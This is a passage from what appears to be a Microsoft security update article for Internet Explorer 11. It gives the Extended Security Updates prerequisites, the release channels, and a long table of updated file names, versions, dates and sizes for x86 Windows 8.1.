Security Update (ESU): \n \nFor Windows 7 SP1 and Windows Server 2008 R2 SP1, you must have installed the \"Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4538483](<https://support.microsoft.com/en/help/4538483>)) or the \"Update for the Extended Security Updates (ESU) Licensing Preparation Package\" ([KB4575903](<https://support.microsoft.com/help/4575903>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). \n \nFor Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, you must have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems and follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends. Extended support ends as follows:\n * For Windows 7 SP1, Windows Server 2008 R2 SP1, and Windows Server 2008 SP2, extended support ends on January 14, 2020.\n * For Windows Embedded Standard 7, extended support ends on October 13, 2020.\nFor more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>). \n \nFor Windows Embedded Standard 7, Windows Management Instrumentation (WMI) must be enabled to get updates from Windows Update or Windows Server Update Services. \n \nFor Windows Thin PC, you must have the August 11, 2020 SSU ([KB4570673](<https://support.microsoft.com/help/4570673>)) or a later SSU installed to make sure you continue to get the extended security updates starting with the October 13, 2020 updates.**Important **You must restart your device after you install these required updates.**Install this update**To install this update, use one of the following release channels.**Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| No| See the other following options. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5005563>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically synchronize with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2, Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1, Windows Server 2012, Windows Embedded 8 Standard, Windows 8.1, Windows Server 2012 R2**Classification**: Security Updates \n \n## **File information**\n\nThe English (United States) version of this software update installs files that have the attributes that are listed in the following tables.**Note** The MANIFEST files (.manifest) and MUM files (.mum) that are installed are not listed.\n\n### **Windows 8.1, Windows RT 8.1 and Windows Server 2012 R2**\n\n### \n\n__\n\nInternet Explorer 11 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 73,728 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 78,848 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 61,440 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 74,752 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 62,464 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 75,264 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 73,216 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 41,472 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 37,888 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 68,608 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 67,584 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 74,240 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 70,656 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:26| 230,912 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 20:55| 489,472 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:52| 38,912 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:35| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:36| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:33| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 19:47| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:27| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:26| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:29| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:31| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:30| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 4,096 \nF12.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:39| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:37| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:38| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:32| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 1:34| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Resources.dll| 11.0.9600.18939| 10-Feb-2018| 9:17| 10,948,096 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nF12.dll| 11.0.9600.19963| 12-Feb-2021| 18:17| 1,207,808 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:40| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nieetwcollector.exe| 11.0.9600.18666| 16-Apr-2017| 0:47| 104,960 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 2:19| 4,096 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 19:58| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 19:58| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 19:58| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 19:58| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:36| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 21:05| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMemoryAnalyzer.dll| 11.0.9600.20045| 4-Jun-2021| 21:48| 1,399,296 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:18| 65 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \ndesktop.ini| Not versioned| 18-Jun-2013| 5:19| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:11| 692,224 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:23| 154,112 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 124,928 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 12:11| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,082,816 